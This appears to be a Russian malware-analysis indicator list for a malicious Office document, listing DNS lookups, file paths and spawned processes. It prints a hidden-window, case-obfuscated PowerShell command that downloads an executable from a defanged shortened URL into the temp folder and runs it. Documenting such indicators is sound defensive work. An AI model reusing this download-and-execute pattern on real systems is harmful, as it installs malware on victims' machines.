Техническая информация
- http://bi#.ly/2pic6zi как %temp%\987654.pif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{3b005015-a61a-440c-877a-ad2fd08bff27}.tmp
- http://bi#.ly/2PIc6zi
- DNS ASK bi#.ly
- DNS ASK te##.adsaca.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bi#.ly/2PIc6zi ” , ”$ENv:teMp\987654.pif” ) ; stARt ”$ENv:tEMP\987654.pif”' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding